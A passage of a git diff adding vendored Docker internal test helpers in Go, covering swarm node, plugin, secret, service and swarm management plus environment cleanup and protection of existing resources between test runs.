b/vendor/github.com/docker/docker/internal/test/daemon/node.go @@ -0,0 +1,82 @@ +package daemon + +import ( + "context" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// NodeConstructor defines a swarm node constructor +type NodeConstructor func(*swarm.Node) + +// GetNode returns a swarm node identified by the specified id +func (d *Daemon) GetNode(t assert.TestingT, id string) *swarm.Node { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + node, _, err := cli.NodeInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + assert.Check(t, node.ID == id) + return &node +} + +// RemoveNode removes the specified node +func (d *Daemon) RemoveNode(t assert.TestingT, id string, force bool) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + options := types.NodeRemoveOptions{ + Force: force, + } + err := cli.NodeRemove(context.Background(), id, options) + assert.NilError(t, err) +} + +// UpdateNode updates a swarm node with the specified node constructor +func (d *Daemon) UpdateNode(t assert.TestingT, id string, f ...NodeConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + for i := 0; ; i++ { + node := d.GetNode(t, id) + for _, fn := range f { + fn(node) + } + + err := cli.NodeUpdate(context.Background(), node.ID, node.Version, node.Spec) + if i < 10 && err != nil && strings.Contains(err.Error(), "update out of sequence") { + time.Sleep(100 * time.Millisecond) + continue + } + assert.NilError(t, err) + return + } +} + +// ListNodes returns the list of the current swarm nodes +func (d *Daemon) ListNodes(t assert.TestingT) []swarm.Node { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + nodes, err := 
cli.NodeList(context.Background(), types.NodeListOptions{}) + assert.NilError(t, err) + + return nodes +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/ops.go b/vendor/github.com/docker/docker/internal/test/daemon/ops.go new file mode 100644 index 0000000000..34db073b57 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/ops.go @@ -0,0 +1,44 @@ +package daemon + +import "github.com/docker/docker/internal/test/environment" + +// WithExperimental sets the daemon in experimental mode +func WithExperimental(d *Daemon) { + d.experimental = true + d.init = true +} + +// WithInit sets the daemon init +func WithInit(d *Daemon) { + d.init = true +} + +// WithDockerdBinary sets the dockerd binary to the specified one +func WithDockerdBinary(dockerdBinary string) func(*Daemon) { + return func(d *Daemon) { + d.dockerdBinary = dockerdBinary + } +} + +// WithSwarmPort sets the swarm port to use for swarm mode +func WithSwarmPort(port int) func(*Daemon) { + return func(d *Daemon) { + d.SwarmPort = port + } +} + +// WithSwarmListenAddr sets the swarm listen addr to use for swarm mode +func WithSwarmListenAddr(listenAddr string) func(*Daemon) { + return func(d *Daemon) { + d.swarmListenAddr = listenAddr + } +} + +// WithEnvironment sets options from internal/test/environment.Execution struct +func WithEnvironment(e environment.Execution) func(*Daemon) { + return func(d *Daemon) { + if e.DaemonInfo.ExperimentalBuild { + d.experimental = true + } + } +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/plugin.go b/vendor/github.com/docker/docker/internal/test/daemon/plugin.go new file mode 100644 index 0000000000..63bbeed219 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/plugin.go @@ -0,0 +1,77 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "gotest.tools/poll" +) + +// PluginIsRunning provides a poller to check if the specified 
plugin is running +func (d *Daemon) PluginIsRunning(name string) func(poll.LogT) poll.Result { + return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result { + if plugin.Enabled { + return poll.Success() + } + return poll.Continue("plugin %q is not enabled", name) + })) +} + +// PluginIsNotRunning provides a poller to check if the specified plugin is not running +func (d *Daemon) PluginIsNotRunning(name string) func(poll.LogT) poll.Result { + return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result { + if !plugin.Enabled { + return poll.Success() + } + return poll.Continue("plugin %q is enabled", name) + })) +} + +// PluginIsNotPresent provides a poller to check if the specified plugin is not present +func (d *Daemon) PluginIsNotPresent(name string) func(poll.LogT) poll.Result { + return withClient(d, func(c client.APIClient, t poll.LogT) poll.Result { + _, _, err := c.PluginInspectWithRaw(context.Background(), name) + if client.IsErrNotFound(err) { + return poll.Success() + } + if err != nil { + return poll.Error(err) + } + return poll.Continue("plugin %q exists", name) + }) +} + +// PluginReferenceIs provides a poller to check if the specified plugin has the specified reference +func (d *Daemon) PluginReferenceIs(name, expectedRef string) func(poll.LogT) poll.Result { + return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result { + if plugin.PluginReference == expectedRef { + return poll.Success() + } + return poll.Continue("plugin %q reference is not %q", name, expectedRef) + })) +} + +func withPluginInspect(name string, f func(*types.Plugin, poll.LogT) poll.Result) func(client.APIClient, poll.LogT) poll.Result { + return func(c client.APIClient, t poll.LogT) poll.Result { + plugin, _, err := c.PluginInspectWithRaw(context.Background(), name) + if client.IsErrNotFound(err) { + return poll.Continue("plugin %q not found", name) + } + if err != nil { 
+ return poll.Error(err) + } + return f(plugin, t) + } + +} + +func withClient(d *Daemon, f func(client.APIClient, poll.LogT) poll.Result) func(poll.LogT) poll.Result { + return func(t poll.LogT) poll.Result { + c, err := d.NewClient() + if err != nil { + poll.Error(err) + } + return f(c, t) + } +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/secret.go b/vendor/github.com/docker/docker/internal/test/daemon/secret.go new file mode 100644 index 0000000000..f3db7a4260 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/secret.go @@ -0,0 +1,84 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// SecretConstructor defines a swarm secret constructor +type SecretConstructor func(*swarm.Secret) + +// CreateSecret creates a secret given the specified spec +func (d *Daemon) CreateSecret(t assert.TestingT, secretSpec swarm.SecretSpec) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + scr, err := cli.SecretCreate(context.Background(), secretSpec) + assert.NilError(t, err) + + return scr.ID +} + +// ListSecrets returns the list of the current swarm secrets +func (d *Daemon) ListSecrets(t assert.TestingT) []swarm.Secret { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + secrets, err := cli.SecretList(context.Background(), types.SecretListOptions{}) + assert.NilError(t, err) + return secrets +} + +// GetSecret returns a swarm secret identified by the specified id +func (d *Daemon) GetSecret(t assert.TestingT, id string) *swarm.Secret { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + secret, _, err := cli.SecretInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + return &secret +} + +// DeleteSecret 
removes the swarm secret identified by the specified id +func (d *Daemon) DeleteSecret(t assert.TestingT, id string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + err := cli.SecretRemove(context.Background(), id) + assert.NilError(t, err) +} + +// UpdateSecret updates the swarm secret identified by the specified id +// Currently, only label update is supported. +func (d *Daemon) UpdateSecret(t assert.TestingT, id string, f ...SecretConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + secret := d.GetSecret(t, id) + for _, fn := range f { + fn(secret) + } + + err := cli.SecretUpdate(context.Background(), secret.ID, secret.Version, secret.Spec) + + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/service.go b/vendor/github.com/docker/docker/internal/test/daemon/service.go new file mode 100644 index 0000000000..0f88ca786b --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/service.go @@ -0,0 +1,131 @@ +package daemon + +import ( + "context" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// ServiceConstructor defines a swarm service constructor function +type ServiceConstructor func(*swarm.Service) + +func (d *Daemon) createServiceWithOptions(t assert.TestingT, opts types.ServiceCreateOptions, f ...ServiceConstructor) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + var service swarm.Service + for _, fn := range f { + fn(&service) + } + + cli := d.NewClientT(t) + defer cli.Close() + + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + + res, err := cli.ServiceCreate(ctx, service.Spec, opts) + assert.NilError(t, err) + return res.ID +} + +// CreateService 
creates a swarm service given the specified service constructor +func (d *Daemon) CreateService(t assert.TestingT, f ...ServiceConstructor) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + return d.createServiceWithOptions(t, types.ServiceCreateOptions{}, f...) +} + +// GetService returns the swarm service corresponding to the specified id +func (d *Daemon) GetService(t assert.TestingT, id string) *swarm.Service { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + service, _, err := cli.ServiceInspectWithRaw(context.Background(), id, types.ServiceInspectOptions{}) + assert.NilError(t, err) + return &service +} + +// GetServiceTasks returns the swarm tasks for the specified service +func (d *Daemon) GetServiceTasks(t assert.TestingT, service string) []swarm.Task { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filterArgs.Add("service", service) + + options := types.TaskListOptions{ + Filters: filterArgs, + } + + tasks, err := cli.TaskList(context.Background(), options) + assert.NilError(t, err) + return tasks +} + +// UpdateService updates a swarm service with the specified service constructor +func (d *Daemon) UpdateService(t assert.TestingT, service *swarm.Service, f ...ServiceConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + for _, fn := range f { + fn(service) + } + + _, err := cli.ServiceUpdate(context.Background(), service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{}) + assert.NilError(t, err) +} + +// RemoveService removes the specified service +func (d *Daemon) RemoveService(t assert.TestingT, id string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + err := cli.ServiceRemove(context.Background(), id) + 
assert.NilError(t, err) +} + +// ListServices returns the list of the current swarm services +func (d *Daemon) ListServices(t assert.TestingT) []swarm.Service { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + services, err := cli.ServiceList(context.Background(), types.ServiceListOptions{}) + assert.NilError(t, err) + return services +} + +// GetTask returns the swarm task identified by the specified id +func (d *Daemon) GetTask(t assert.TestingT, id string) swarm.Task { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + task, _, err := cli.TaskInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + return task +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/swarm.go b/vendor/github.com/docker/docker/internal/test/daemon/swarm.go new file mode 100644 index 0000000000..e8e8b945de --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/swarm.go @@ -0,0 +1,194 @@ +package daemon + +import ( + "context" + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +const ( + // DefaultSwarmPort is the default port use for swarm in the tests + DefaultSwarmPort = 2477 + defaultSwarmListenAddr = "0.0.0.0" +) + +// StartAndSwarmInit starts the daemon (with busybox) and init the swarm +func (d *Daemon) StartAndSwarmInit(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // avoid networking conflicts + args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} + d.StartWithBusybox(t, args...) 
+ + d.SwarmInit(t, swarm.InitRequest{}) +} + +// StartAndSwarmJoin starts the daemon (with busybox) and join the specified swarm as worker or manager +func (d *Daemon) StartAndSwarmJoin(t testingT, leader *Daemon, manager bool) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // avoid networking conflicts + args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} + d.StartWithBusybox(t, args...) + + tokens := leader.JoinTokens(t) + token := tokens.Worker + if manager { + token = tokens.Manager + } + d.SwarmJoin(t, swarm.JoinRequest{ + RemoteAddrs: []string{leader.SwarmListenAddr()}, + JoinToken: token, + }) +} + +// SpecConstructor defines a swarm spec constructor +type SpecConstructor func(*swarm.Spec) + +// SwarmListenAddr returns the listen-addr used for the daemon +func (d *Daemon) SwarmListenAddr() string { + return fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort) +} + +// NodeID returns the swarm mode node ID +func (d *Daemon) NodeID() string { + return d.CachedInfo.Swarm.NodeID +} + +// SwarmInit initializes a new swarm cluster. +func (d *Daemon) SwarmInit(t assert.TestingT, req swarm.InitRequest) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if req.ListenAddr == "" { + req.ListenAddr = fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort) + } + cli := d.NewClientT(t) + defer cli.Close() + _, err := cli.SwarmInit(context.Background(), req) + assert.NilError(t, err, "initializing swarm") + d.CachedInfo = d.Info(t) +} + +// SwarmJoin joins a daemon to an existing cluster. 
+func (d *Daemon) SwarmJoin(t assert.TestingT, req swarm.JoinRequest) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if req.ListenAddr == "" { + req.ListenAddr = fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort) + } + cli := d.NewClientT(t) + defer cli.Close() + err := cli.SwarmJoin(context.Background(), req) + assert.NilError(t, err, "initializing swarm") + d.CachedInfo = d.Info(t) +} + +// SwarmLeave forces daemon to leave current cluster. +func (d *Daemon) SwarmLeave(force bool) error { + cli, err := d.NewClient() + if err != nil { + return fmt.Errorf("leaving swarm: failed to create client %v", err) + } + defer cli.Close() + err = cli.SwarmLeave(context.Background(), force) + if err != nil { + err = fmt.Errorf("leaving swarm: %v", err) + } + return err +} + +// SwarmInfo returns the swarm information of the daemon +func (d *Daemon) SwarmInfo(t assert.TestingT) swarm.Info { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + info, err := cli.Info(context.Background()) + assert.NilError(t, err, "get swarm info") + return info.Swarm +} + +// SwarmUnlock tries to unlock a locked swarm +func (d *Daemon) SwarmUnlock(req swarm.UnlockRequest) error { + cli, err := d.NewClient() + if err != nil { + return fmt.Errorf("unlocking swarm: failed to create client %v", err) + } + defer cli.Close() + err = cli.SwarmUnlock(context.Background(), req) + if err != nil { + err = errors.Wrap(err, "unlocking swarm") + } + return err +} + +// GetSwarm returns the current swarm object +func (d *Daemon) GetSwarm(t assert.TestingT) swarm.Swarm { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw, err := cli.SwarmInspect(context.Background()) + assert.NilError(t, err) + return sw +} + +// UpdateSwarm updates the current swarm object with the specified spec constructors +func (d *Daemon) UpdateSwarm(t assert.TestingT, f ...SpecConstructor) { + if ht, ok := t.(test.HelperT); ok { + 
ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw := d.GetSwarm(t) + for _, fn := range f { + fn(&sw.Spec) + } + + err := cli.SwarmUpdate(context.Background(), sw.Version, sw.Spec, swarm.UpdateFlags{}) + assert.NilError(t, err) +} + +// RotateTokens update the swarm to rotate tokens +func (d *Daemon) RotateTokens(t assert.TestingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw, err := cli.SwarmInspect(context.Background()) + assert.NilError(t, err) + + flags := swarm.UpdateFlags{ + RotateManagerToken: true, + RotateWorkerToken: true, + } + + err = cli.SwarmUpdate(context.Background(), sw.Version, sw.Spec, flags) + assert.NilError(t, err) +} + +// JoinTokens returns the current swarm join tokens +func (d *Daemon) JoinTokens(t assert.TestingT) swarm.JoinTokens { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw, err := cli.SwarmInspect(context.Background()) + assert.NilError(t, err) + return sw.JoinTokens +} diff --git a/vendor/github.com/docker/docker/internal/test/environment/clean.go b/vendor/github.com/docker/docker/internal/test/environment/clean.go new file mode 100644 index 0000000000..93dee593f2 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/environment/clean.go @@ -0,0 +1,217 @@ +package environment // import "github.com/docker/docker/internal/test/environment" + +import ( + "context" + "regexp" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +type testingT interface { + assert.TestingT + logT + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +// Clean the environment, preserving protected objects (images, containers, ...) +// and removing everything else. 
It's meant to run after any tests so that they don't +// depend on each others. +func (e *Execution) Clean(t assert.TestingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := e.APIClient() + + platform := e.OSType + if (platform != "windows") || (platform == "windows" && e.DaemonInfo.Isolation == "hyperv") { + unpauseAllContainers(t, client) + } + deleteAllContainers(t, client, e.protectedElements.containers) + deleteAllImages(t, client, e.protectedElements.images) + deleteAllVolumes(t, client, e.protectedElements.volumes) + deleteAllNetworks(t, client, platform, e.protectedElements.networks) + if platform == "linux" { + deleteAllPlugins(t, client, e.protectedElements.plugins) + } +} + +func unpauseAllContainers(t assert.TestingT, client client.ContainerAPIClient) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ctx := context.Background() + containers := getPausedContainers(ctx, t, client) + if len(containers) > 0 { + for _, container := range containers { + err := client.ContainerUnpause(ctx, container.ID) + assert.Check(t, err, "failed to unpause container %s", container.ID) + } + } +} + +func getPausedContainers(ctx context.Context, t assert.TestingT, client client.ContainerAPIClient) []types.Container { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + filter := filters.NewArgs() + filter.Add("status", "paused") + containers, err := client.ContainerList(ctx, types.ContainerListOptions{ + Filters: filter, + Quiet: true, + All: true, + }) + assert.Check(t, err, "failed to list containers") + return containers +} + +var alreadyExists = regexp.MustCompile(`Error response from daemon: removal of container (\w+) is already in progress`) + +func deleteAllContainers(t assert.TestingT, apiclient client.ContainerAPIClient, protectedContainers map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ctx := context.Background() + containers := getAllContainers(ctx, t, apiclient) + if len(containers) == 0 { + 
return + } + + for _, container := range containers { + if _, ok := protectedContainers[container.ID]; ok { + continue + } + err := apiclient.ContainerRemove(ctx, container.ID, types.ContainerRemoveOptions{ + Force: true, + RemoveVolumes: true, + }) + if err == nil || client.IsErrNotFound(err) || alreadyExists.MatchString(err.Error()) || isErrNotFoundSwarmClassic(err) { + continue + } + assert.Check(t, err, "failed to remove %s", container.ID) + } +} + +func getAllContainers(ctx context.Context, t assert.TestingT, client client.ContainerAPIClient) []types.Container { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + containers, err := client.ContainerList(ctx, types.ContainerListOptions{ + Quiet: true, + All: true, + }) + assert.Check(t, err, "failed to list containers") + return containers +} + +func deleteAllImages(t assert.TestingT, apiclient client.ImageAPIClient, protectedImages map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{}) + assert.Check(t, err, "failed to list images") + + ctx := context.Background() + for _, image := range images { + tags := tagsFromImageSummary(image) + if len(tags) == 0 { + removeImage(ctx, t, apiclient, image.ID) + continue + } + for _, tag := range tags { + if _, ok := protectedImages[tag]; !ok { + removeImage(ctx, t, apiclient, tag) + } + } + } +} + +func removeImage(ctx context.Context, t assert.TestingT, apiclient client.ImageAPIClient, ref string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + _, err := apiclient.ImageRemove(ctx, ref, types.ImageRemoveOptions{ + Force: true, + }) + if client.IsErrNotFound(err) { + return + } + assert.Check(t, err, "failed to remove image %s", ref) +} + +func deleteAllVolumes(t assert.TestingT, c client.VolumeAPIClient, protectedVolumes map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + volumes, err := 
c.VolumeList(context.Background(), filters.Args{}) + assert.Check(t, err, "failed to list volumes") + + for _, v := range volumes.Volumes { + if _, ok := protectedVolumes[v.Name]; ok { + continue + } + err := c.VolumeRemove(context.Background(), v.Name, true) + // Docker EE may list volumes that no longer exist. + if isErrNotFoundSwarmClassic(err) { + continue + } + assert.Check(t, err, "failed to remove volume %s", v.Name) + } +} + +func deleteAllNetworks(t assert.TestingT, c client.NetworkAPIClient, daemonPlatform string, protectedNetworks map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{}) + assert.Check(t, err, "failed to list networks") + + for _, n := range networks { + if n.Name == "bridge" || n.Name == "none" || n.Name == "host" { + continue + } + if _, ok := protectedNetworks[n.ID]; ok { + continue + } + if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" { + // nat is a pre-defined network on Windows and cannot be removed + continue + } + err := c.NetworkRemove(context.Background(), n.ID) + assert.Check(t, err, "failed to remove network %s", n.ID) + } +} + +func deleteAllPlugins(t assert.TestingT, c client.PluginAPIClient, protectedPlugins map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + plugins, err := c.PluginList(context.Background(), filters.Args{}) + // Docker EE does not allow cluster-wide plugin management. + if client.IsErrNotImplemented(err) { + return + } + assert.Check(t, err, "failed to list plugins") + + for _, p := range plugins { + if _, ok := protectedPlugins[p.Name]; ok { + continue + } + err := c.PluginRemove(context.Background(), p.Name, types.PluginRemoveOptions{Force: true}) + assert.Check(t, err, "failed to remove plugin %s", p.ID) + } +} + +// Swarm classic aggregates node errors and returns a 500 so we need to check +// the error string instead of just IsErrNotFound(). 
+func isErrNotFoundSwarmClassic(err error) bool { + return err != nil && strings.Contains(strings.ToLower(err.Error()), "no such") +} diff --git a/vendor/github.com/docker/docker/internal/test/environment/environment.go b/vendor/github.com/docker/docker/internal/test/environment/environment.go new file mode 100644 index 0000000000..74c8e2ce0a --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/environment/environment.go @@ -0,0 +1,158 @@ +package environment // import "github.com/docker/docker/internal/test/environment" + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test/fixtures/load" + "github.com/pkg/errors" +) + +// Execution contains information about the current test execution and daemon +// under test +type Execution struct { + client client.APIClient + DaemonInfo types.Info + OSType string + PlatformDefaults PlatformDefaults + protectedElements protectedElements +} + +// PlatformDefaults are defaults values for the platform of the daemon under test +type PlatformDefaults struct { + BaseImage string + VolumesConfigPath string + ContainerStoragePath string +} + +// New creates a new Execution struct +func New() (*Execution, error) { + client, err := client.NewClientWithOpts(client.FromEnv) + if err != nil { + return nil, errors.Wrapf(err, "failed to create client") + } + + info, err := client.Info(context.Background()) + if err != nil { + return nil, errors.Wrapf(err, "failed to get info from daemon") + } + + osType := getOSType(info) + + return &Execution{ + client: client, + DaemonInfo: info, + OSType: osType, + PlatformDefaults: getPlatformDefaults(info, osType), + protectedElements: newProtectedElements(), + }, nil +} + +func getOSType(info types.Info) string { + // Docker EE does not set the OSType so allow the user to override this value. 
+ userOsType := os.Getenv("TEST_OSTYPE") + if userOsType != "" { + return userOsType + } + return info.OSType +} + +func getPlatformDefaults(info types.Info, osType string) PlatformDefaults { + volumesPath := filepath.Join(info.DockerRootDir, "volumes") + containersPath := filepath.Join(info.DockerRootDir, "containers") + + switch osType { + case "linux": + return PlatformDefaults{ + BaseImage: "scratch", + VolumesConfigPath: toSlash(volumesPath), + ContainerStoragePath: toSlash(containersPath), + } + case "windows": + baseImage := "microsoft/windowsservercore" + if override := os.Getenv("WINDOWS_BASE_IMAGE"); override != "" { + baseImage = override + fmt.Println("INFO: Windows Base image is ", baseImage) + } + return PlatformDefaults{ + BaseImage: baseImage, + VolumesConfigPath: filepath.FromSlash(volumesPath), + ContainerStoragePath: filepath.FromSlash(containersPath), + } + default: + panic(fmt.Sprintf("unknown OSType for daemon: %s", osType)) + } +} + +// Make sure in context of daemon, not the local platform. Note we can't +// use filepath.FromSlash or ToSlash here as they are a no-op on Unix. +func toSlash(path string) string { + return strings.Replace(path, `\`, `/`, -1) +} + +// IsLocalDaemon is true if the daemon under test is on the same +// host as the test process. +// +// Deterministically working out the environment in which CI is running +// to evaluate whether the daemon is local or remote is not possible through +// a build tag. +// +// For example Windows to Linux CI under Jenkins tests the 64-bit +// Windows binary build with the daemon build tag, but calls a remote +// Linux daemon. +// +// We can't just say if Windows then assume the daemon is local as at +// some point, we will be testing the Windows CLI against a Windows daemon. +// +// Similarly, it will be perfectly valid to also run CLI tests from +// a Linux CLI (built with the daemon tag) against a Windows daemon. 
+func (e *Execution) IsLocalDaemon() bool { + return os.Getenv("DOCKER_REMOTE_DAEMON") == "" +} + +// IsRemoteDaemon is true if the daemon under test is on different host +// as the test process. +func (e *Execution) IsRemoteDaemon() bool { + return !e.IsLocalDaemon() +} + +// DaemonAPIVersion returns the negotiated daemon api version +func (e *Execution) DaemonAPIVersion() string { + version, err := e.APIClient().ServerVersion(context.TODO()) + if err != nil { + return "" + } + return version.APIVersion +} + +// Print the execution details to stdout +// TODO: print everything +func (e *Execution) Print() { + if e.IsLocalDaemon() { + fmt.Println("INFO: Testing against a local daemon") + } else { + fmt.Println("INFO: Testing against a remote daemon") + } +} + +// APIClient returns an APIClient connected to the daemon under test +func (e *Execution) APIClient() client.APIClient { + return e.client +} + +// EnsureFrozenImagesLinux loads frozen test images into the daemon +// if they aren't already loaded +func EnsureFrozenImagesLinux(testEnv *Execution) error { + if testEnv.OSType == "linux" { + err := load.FrozenImagesLinux(testEnv.APIClient(), frozenImages...) 
+ if err != nil { + return errors.Wrap(err, "error loading frozen images") + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/internal/test/environment/protect.go b/vendor/github.com/docker/docker/internal/test/environment/protect.go new file mode 100644 index 0000000000..b5b27d2dd4 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/environment/protect.go @@ -0,0 +1,254 @@ +package environment // import "github.com/docker/docker/internal/test/environment" + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + dclient "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +var frozenImages = []string{"busybox:latest", "busybox:glibc", "hello-world:frozen", "debian:jessie"} + +type protectedElements struct { + containers map[string]struct{} + images map[string]struct{} + networks map[string]struct{} + plugins map[string]struct{} + volumes map[string]struct{} +} + +func newProtectedElements() protectedElements { + return protectedElements{ + containers: map[string]struct{}{}, + images: map[string]struct{}{}, + networks: map[string]struct{}{}, + plugins: map[string]struct{}{}, + volumes: map[string]struct{}{}, + } +} + +// ProtectAll protects the existing environment (containers, images, networks, +// volumes, and, on Linux, plugins) from being cleaned up at the end of test +// runs +func ProtectAll(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ProtectContainers(t, testEnv) + ProtectImages(t, testEnv) + ProtectNetworks(t, testEnv) + ProtectVolumes(t, testEnv) + if testEnv.OSType == "linux" { + ProtectPlugins(t, testEnv) + } +} + +// ProtectContainer adds the specified container(s) to be protected in case of +// clean +func (e *Execution) ProtectContainer(t testingT, containers ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, container := range containers 
{ + e.protectedElements.containers[container] = struct{}{} + } +} + +// ProtectContainers protects existing containers from being cleaned up at the +// end of test runs +func ProtectContainers(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + containers := getExistingContainers(t, testEnv) + testEnv.ProtectContainer(t, containers...) +} + +func getExistingContainers(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + containerList, err := client.ContainerList(context.Background(), types.ContainerListOptions{ + All: true, + }) + assert.NilError(t, err, "failed to list containers") + + var containers []string + for _, container := range containerList { + containers = append(containers, container.ID) + } + return containers +} + +// ProtectImage adds the specified image(s) to be protected in case of clean +func (e *Execution) ProtectImage(t testingT, images ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, image := range images { + e.protectedElements.images[image] = struct{}{} + } +} + +// ProtectImages protects existing images and on linux frozen images from being +// cleaned up at the end of test runs +func ProtectImages(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + images := getExistingImages(t, testEnv) + + if testEnv.OSType == "linux" { + images = append(images, frozenImages...) + } + testEnv.ProtectImage(t, images...) 
